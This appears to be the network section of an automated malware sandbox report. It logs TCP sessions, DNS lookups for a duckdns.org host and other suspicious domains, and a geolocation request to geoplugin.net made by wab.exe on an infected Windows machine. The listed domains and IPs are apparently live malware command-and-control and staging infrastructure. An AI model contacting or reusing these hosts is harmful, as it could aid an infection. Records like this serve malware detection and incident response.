                                                            Aug 28, 2024 14:04:26.541394949 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.541436911 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:27.554071903 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.572323084 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.577250957 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.577337027 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.579457998 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.585113049 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585243940 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585253000 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585259914 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585268974 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585392952 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585402012 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585410118 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585418940 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:29.049917936 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:29.050432920 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:29.050512075 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:30.085091114 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.103549004 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.108398914 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.108485937 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.110239029 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.115151882 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.579495907 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.580043077 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.580553055 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.582659960 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.587441921 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:36.605781078 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:36.610630035 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:36.610717058 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:36.612497091 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:36.617247105 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:38.000725031 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:38.000818014 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:38.116492987 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:38.121364117 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.134938002 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:39.139874935 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.139944077 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:39.141765118 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:39.146971941 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.620131969 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.621944904 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:40.647686958 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:40.652704954 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.665997028 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:41.673358917 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.673799992 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:41.677159071 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:41.682140112 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682146072 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682156086 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682173967 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682178020 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682224989 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682229996 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.683254004 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.683259010 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:42.147622108 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:42.147766113 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:43.179044008 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:43.183949947 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.197817087 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.202904940 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.202996016 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.204821110 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.209969044 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.667821884 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.668117046 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.668226957 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.674926043 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.681942940 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:49.901578903 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:49.906582117 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:49.906668901 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:49.908469915 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:49.913341045 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:51.095119953 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:51.095278978 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:51.095333099 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:51.413247108 CEST4977080192.168.2.4142.250.186.147
Aug 28, 2024 14:04:52.432606936 CEST | 49771 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:52.437967062 CEST | 80 | 49771 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:52.438035965 CEST | 49771 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:52.440644979 CEST | 49771 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:52.446029902 CEST | 80 | 49771 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:53.282835007 CEST | 80 | 49771 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:53.283516884 CEST | 80 | 49771 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:53.283615112 CEST | 49771 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:53.945833921 CEST | 49771 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:54.373491049 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:04:54.375338078 CEST | 49738 | 57484 | 192.168.2.4 | 172.111.137.132
Aug 28, 2024 14:04:54.384243965 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:04:54.963156939 CEST | 49772 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:54.970845938 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.970943928 CEST | 49772 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:54.973089933 CEST | 49772 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:54.978076935 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978090048 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978096962 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978327036 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978462934 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978471994 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978629112 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978638887 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:54.978641987 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:55.817486048 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:55.818305016 CEST | 80 | 49772 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:55.821968079 CEST | 49772 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:56.476066113 CEST | 49772 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:57.494559050 CEST | 49773 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:57.499845028 CEST | 80 | 49773 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:57.500050068 CEST | 49773 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:57.501735926 CEST | 49773 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:57.507227898 CEST | 80 | 49773 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:58.729914904 CEST | 80 | 49773 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:58.730149984 CEST | 80 | 49773 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:04:58.730195045 CEST | 49773 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:58.732712984 CEST | 49773 | 80 | 192.168.2.4 | 142.250.186.147
Aug 28, 2024 14:04:58.740299940 CEST | 80 | 49773 | 142.250.186.147 | 192.168.2.4
Aug 28, 2024 14:05:04.180114031 CEST | 49774 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:04.189026117 CEST | 80 | 49774 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:04.189908981 CEST | 49774 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:04.191656113 CEST | 49774 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:04.198338985 CEST | 80 | 49774 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:04.819679022 CEST | 80 | 49774 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:04.819696903 CEST | 80 | 49774 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:04.819789886 CEST | 49774 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:05.694740057 CEST | 49774 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:06.713886023 CEST | 49775 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:06.718915939 CEST | 80 | 49775 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:06.719172955 CEST | 49775 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:06.721204042 CEST | 49775 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:06.727803946 CEST | 80 | 49775 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:07.326870918 CEST | 80 | 49775 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:07.328321934 CEST | 80 | 49775 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:07.328378916 CEST | 49775 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:08.225851059 CEST | 49775 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:09.244163990 CEST | 49776 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:09.249456882 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.250026941 CEST | 49776 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:09.252142906 CEST | 49776 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:09.257117987 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257220030 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257236958 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257241964 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257266045 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257322073 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257375956 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257379055 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.257384062 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.964644909 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.964663029 CEST | 80 | 49776 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:09.964721918 CEST | 49776 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:10.757101059 CEST | 49776 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:11.775708914 CEST | 49777 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:11.780622959 CEST | 80 | 49777 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:11.780836105 CEST | 49777 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:11.782677889 CEST | 49777 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:11.790293932 CEST | 80 | 49777 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:12.408523083 CEST | 80 | 49777 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:12.409252882 CEST | 80 | 49777 | 203.161.41.205 | 192.168.2.4
Aug 28, 2024 14:05:12.409302950 CEST | 49777 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:12.411117077 CEST | 49777 | 80 | 192.168.2.4 | 203.161.41.205
Aug 28, 2024 14:05:12.415903091 CEST | 80 | 49777 | 203.161.41.205 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 14:01:11.392865896 CEST | 56834 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:01:11.409470081 CEST | 53 | 56834 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:01:53.363734007 CEST | 57554 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:01:54.366015911 CEST | 57554 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:01:54.994407892 CEST | 53 | 57554 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:01:54.995183945 CEST | 53 | 57554 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:01:56.038767099 CEST | 59230 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:01:56.046408892 CEST | 53 | 59230 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:02:00.408345938 CEST | 56047 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:02:00.421741009 CEST | 53 | 56047 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:03:08.439939022 CEST | 50575 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:03:08.473172903 CEST | 53 | 50575 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:03:24.011481047 CEST | 59036 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:03:24.362660885 CEST | 53 | 59036 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:03:42.619318008 CEST | 56620 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:03:42.631748915 CEST | 53 | 56620 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:03:55.855211973 CEST | 64100 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:03:56.032749891 CEST | 53 | 64100 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:04:10.121747971 CEST | 56126 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:04:10.181997061 CEST | 53 | 56126 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:04:23.449765921 CEST | 53735 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:04:23.489950895 CEST | 53 | 53735 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:04:36.589979887 CEST | 59338 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:04:36.603564978 CEST | 53 | 59338 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:04:49.681910992 CEST | 53541 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:04:49.899410963 CEST | 53 | 53541 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:05:03.744503975 CEST | 54060 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:05:04.176655054 CEST | 53 | 54060 | 1.1.1.1 | 192.168.2.4
Aug 28, 2024 14:05:17.932250023 CEST | 56865 | 53 | 192.168.2.4 | 1.1.1.1
Aug 28, 2024 14:05:18.439898968 CEST | 53 | 56865 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 14:01:11.392865896 CEST | 192.168.2.4 | 1.1.1.1 | 0x46d8 | Standard query (0) | avocaldoperu.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:53.363734007 CEST | 192.168.2.4 | 1.1.1.1 | 0x3957 | Standard query (0) | iwarsut775laudrye2.duckdns.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:54.366015911 CEST | 192.168.2.4 | 1.1.1.1 | 0x3957 | Standard query (0) | iwarsut775laudrye2.duckdns.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:56.038767099 CEST | 192.168.2.4 | 1.1.1.1 | 0x90fe | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:02:00.408345938 CEST | 192.168.2.4 | 1.1.1.1 | 0x27ad | Standard query (0) | cpanel-adminhost.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:08.439939022 CEST | 192.168.2.4 | 1.1.1.1 | 0x5050 | Standard query (0) | www.ctorq.net | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:24.011481047 CEST | 192.168.2.4 | 1.1.1.1 | 0xa88 | Standard query (0) | www.vendasnaweb1.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:42.619318008 CEST | 192.168.2.4 | 1.1.1.1 | 0xa467 | Standard query (0) | www.411divorce.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:55.855211973 CEST | 192.168.2.4 | 1.1.1.1 | 0x463c | Standard query (0) | www.gtprivatewealth.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:10.121747971 CEST | 192.168.2.4 | 1.1.1.1 | 0xd9e | Standard query (0) | www.katasoo.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:23.449765921 CEST | 192.168.2.4 | 1.1.1.1 | 0xd285 | Standard query (0) | www.martinminorgroup.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:36.589979887 CEST | 192.168.2.4 | 1.1.1.1 | 0x853b | Standard query (0) | www.atlpicsstudios.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:49.681910992 CEST | 192.168.2.4 | 1.1.1.1 | 0xaa21 | Standard query (0) | www.openhandedvision.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:05:03.744503975 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b2e | Standard query (0) | www.shabygreen.top | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:05:17.932250023 CEST | 192.168.2.4 | 1.1.1.1 | 0x4b57 | Standard query (0) | www.kera333.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 14:01:11.409470081 CEST | 1.1.1.1 | 192.168.2.4 | 0x46d8 | No error (0) | avocaldoperu.com | - | 104.21.62.202 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:11.409470081 CEST | 1.1.1.1 | 192.168.2.4 | 0x46d8 | No error (0) | avocaldoperu.com | - | 172.67.138.232 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:54.994407892 CEST | 1.1.1.1 | 192.168.2.4 | 0x3957 | No error (0) | iwarsut775laudrye2.duckdns.org | - | 172.111.137.132 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:54.995183945 CEST | 1.1.1.1 | 192.168.2.4 | 0x3957 | No error (0) | iwarsut775laudrye2.duckdns.org | - | 172.111.137.132 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:01:56.046408892 CEST | 1.1.1.1 | 192.168.2.4 | 0x90fe | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:02:00.421741009 CEST | 1.1.1.1 | 192.168.2.4 | 0x27ad | No error (0) | cpanel-adminhost.com | - | 193.25.216.165 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:08.473172903 CEST | 1.1.1.1 | 192.168.2.4 | 0x5050 | No error (0) | www.ctorq.net | ctorq.net | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:03:08.473172903 CEST | 1.1.1.1 | 192.168.2.4 | 0x5050 | No error (0) | ctorq.net | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:08.473172903 CEST | 1.1.1.1 | 192.168.2.4 | 0x5050 | No error (0) | ctorq.net | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:24.362660885 CEST | 1.1.1.1 | 192.168.2.4 | 0xa88 | No error (0) | www.vendasnaweb1.com | vendasnaweb1.com | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:03:24.362660885 CEST | 1.1.1.1 | 192.168.2.4 | 0xa88 | No error (0) | vendasnaweb1.com | - | 162.241.2.92 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:42.631748915 CEST | 1.1.1.1 | 192.168.2.4 | 0xa467 | No error (0) | www.411divorce.com | 411divorce.com | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:03:42.631748915 CEST | 1.1.1.1 | 192.168.2.4 | 0xa467 | No error (0) | 411divorce.com | - | 5.78.41.174 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:56.032749891 CEST | 1.1.1.1 | 192.168.2.4 | 0x463c | No error (0) | www.gtprivatewealth.com | gtprivatewealth.com | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:03:56.032749891 CEST | 1.1.1.1 | 192.168.2.4 | 0x463c | No error (0) | gtprivatewealth.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:03:56.032749891 CEST | 1.1.1.1 | 192.168.2.4 | 0x463c | No error (0) | gtprivatewealth.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:10.181997061 CEST | 1.1.1.1 | 192.168.2.4 | 0xd9e | No error (0) | www.katasoo.com | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:10.181997061 CEST | 1.1.1.1 | 192.168.2.4 | 0xd9e | No error (0) | www.katasoo.com | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:23.489950895 CEST | 1.1.1.1 | 192.168.2.4 | 0xd285 | No error (0) | www.martinminorgroup.com | pointing.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:04:23.489950895 CEST | 1.1.1.1 | 192.168.2.4 | 0xd285 | No error (0) | pointing.wixdns.net | cdn1.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:04:23.489950895 CEST | 1.1.1.1 | 192.168.2.4 | 0xd285 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:04:23.489950895 CEST | 1.1.1.1 | 192.168.2.4 | 0xd285 | No error (0) | td-ccm-neg-87-45.wixdns.net | - | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:36.603564978 CEST | 1.1.1.1 | 192.168.2.4 | 0x853b | No error (0) | www.atlpicsstudios.com | atlpicsstudios.com | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:04:36.603564978 CEST | 1.1.1.1 | 192.168.2.4 | 0x853b | No error (0) | atlpicsstudios.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:36.603564978 CEST | 1.1.1.1 | 192.168.2.4 | 0x853b | No error (0) | atlpicsstudios.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:04:49.899410963 CEST | 1.1.1.1 | 192.168.2.4 | 0xaa21 | No error (0) | www.openhandedvision.com | ghs.googlehosted.com | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:04:49.899410963 CEST | 1.1.1.1 | 192.168.2.4 | 0xaa21 | No error (0) | ghs.googlehosted.com | - | 142.250.186.147 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:05:04.176655054 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b2e | No error (0) | www.shabygreen.top | - | 203.161.41.205 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 14:05:18.439898968 CEST | 1.1.1.1 | 192.168.2.4 | 0x4b57 | No error (0) | www.kera333.org | kera333.org | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 28, 2024 14:05:18.439898968 CEST | 1.1.1.1 | 192.168.2.4 | 0x4b57 | No error (0) | kera333.org | - | 64.46.102.70 | A (IP address) | IN (0x0001) | false
                                                            • avocaldoperu.com
                                                            • geoplugin.net
                                                            • cpanel-adminhost.com
                                                            • www.ctorq.net
                                                            • www.vendasnaweb1.com
                                                            • www.411divorce.com
                                                            • www.gtprivatewealth.com
                                                            • www.katasoo.com
                                                            • www.martinminorgroup.com
                                                            • www.atlpicsstudios.com
                                                            • www.openhandedvision.com
                                                            • www.shabygreen.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 178.237.33.50 | 80 | 7328 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 14:01:56.052421093 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Aug 28, 2024 14:01:56.654249907 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Wed, 28 Aug 2024 12:01:56 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
